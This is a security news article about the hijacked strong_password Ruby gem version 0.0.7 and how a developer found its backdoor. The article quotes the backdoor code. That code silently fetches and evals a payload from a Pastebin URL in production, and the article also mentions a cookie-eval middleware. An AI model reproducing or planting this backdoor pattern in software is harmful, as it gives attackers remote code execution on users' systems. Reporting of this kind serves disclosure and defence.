RubyGems strong_password Library Hijacked by Threat Actors

Ruby users who updated with strong_password gem version 0.0.7 are urged to roll back to the previous versions after a developer discovered the malicious code in the gem.

The developer named Tute Costa who noticed the inclusion of backdoor while performing regular security audits. He spotted the changes with strong_password on gem hosting service, but not with any branch in GitHub.

“It appeared to have gone from 0.0.6 to 0.0.7, yet the last change in any branch in GitHub was from 6 months ago, and we were up to date with those.”The Strong_password is gem used by developers to check the password strength of the apps.

The strong_password v 0.0.6 was downloaded more than 38,000 times and the backdoored version 0.0.7 was downloaded 537 times.

He further downloaded the gem from Rubygems and compared to the copy in GitHub, following code was added with the latest version and change was appended from a different account than the maintainer’s one.

def !;begin;yield;rescue Exception;end;end 
!{Thread.new{loop{_!{sleep
rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/xa456PFt')))}}}if
Rails.env[0]=="p"}

According to the code, it appears attackers use Pastebin to download the secondary payload, the code runs only if it is running in a production environment with an empty exception.

The attack also injects a middleware that “eval‘s cookies named with an __id suffix, only in production, all surrounded by the empty exception handler! a function that’s defined in the hijacked gem.”

The vulnerability has been assigned with CVE identifier CVE-2019-13354. A newer version 0.0.8 of ruby gem with the clean code is released and the details can be seen from the official page of RubyGems.

Download: Free GDPR Comics Book – Importance of Following General Data Protection Regulation (GDPR) to protect your Company Data and user privacy

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates also you can take the Best Cybersecurity course online to keep yourself updated.

Critical DLL Hijacking Vulnerability in PC-Doctor For Windows Let Hackers Attack Hundreds of Million DELL Computers

Account Take over Vulnerability in EA Origin Game Client Let Hackers Hijack the 300 Million Gamers Account

Gurubaran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Recent Posts

Ivanti Fully Patched Connect Secure RCE Vulnerability That Actively Exploited in the Wild

Ivanti has issued an urgent security advisory for CVE-2025-22457, a critical vulnerability impacting Ivanti Connect…

1 day ago

Beware! Weaponized Job Recruitment Emails Spreading BeaverTail and Tropidoor Malware

A concerning malware campaign was disclosed by the AhnLab Security Intelligence Center (ASEC), revealing how…

1 day ago

EncryptHub Ransomware Uncovered Through ChatGPT Use and OPSEC Failures

EncryptHub, a rapidly evolving cybercriminal entity, has come under intense scrutiny following revelations of operational…

1 day ago

PoisonSeed Targets CRM and Bulk Email Providers in New Supply Chain Phishing Attack

A sophisticated phishing campaign, dubbed "PoisonSeed," has been identified targeting customer relationship management (CRM) and…

1 day ago

Beware! Fake Unpaid Tolls Messages Used in Phishing Attack to Steal Login Credentials

A surge in phishing text messages claiming unpaid tolls has been linked to a massive…

1 day ago

State Bar of Texas Confirms Data Breach, Begins Notifying Affected Consumers

The State Bar of Texas has confirmed a data breach following the detection of unauthorized…

1 day ago